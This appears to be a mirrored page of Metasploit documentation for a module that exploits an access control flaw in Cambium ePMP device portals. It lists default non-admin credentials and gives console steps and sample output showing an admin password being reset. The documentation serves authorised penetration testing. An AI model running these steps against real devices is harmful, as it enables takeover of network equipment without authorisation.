CoCalc -- epmp1000_reset

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/admin/http/epmp1000_reset_pass.md
Views: ¹¹⁷⁸⁸

This module exploits an access control vulnerability in Cambium ePMP device management portal. It requires any one of the following non-admin login credentials - installer/installer, home/home, readonly/readonly - to reset password of other existing user(s) including 'admin'. All versions <=3.5 (current as of today) are affected. The module has been tested on versions 3.0-3.5-RC7.

Verification Steps

Do: use auxiliary/scanner/http/epmp1000_reset_pass
Do: set RHOSTS [IP]
Do: set RPORT [PORT]
Do: set TARGET_USERNAME admin
Do: set NEW_PASSWORD newpass
Do: run

Scenarios

msf > use use auxiliary/scanner/http/epmp1000_reset_pass
msf auxiliary(epmp1000_reset_pass) > set rhosts 1.3.3.7
msf auxiliary(epmp1000_reset_pass) > set rport 80
msf auxiliary(epmp1000_reset_pass) > set TARGET_USERNAME admin
msf auxiliary(epmp1000_reset_pass) > set NEW_PASSWORD newpass
msf auxiliary(epmp1000_reset_pass) > run

[+] 1.3.3.7:80 - Running Cambium ePMP version 3.5...
[*] 1.3.3.7:80 - Attempting to login...
[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "readonly":"readonly"
[*] 1.3.3.7:80 - Changing password for admin to newpass
[+] Password successfully changed!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Verification Steps

Scenarios

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Verification Steps

Scenarios

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.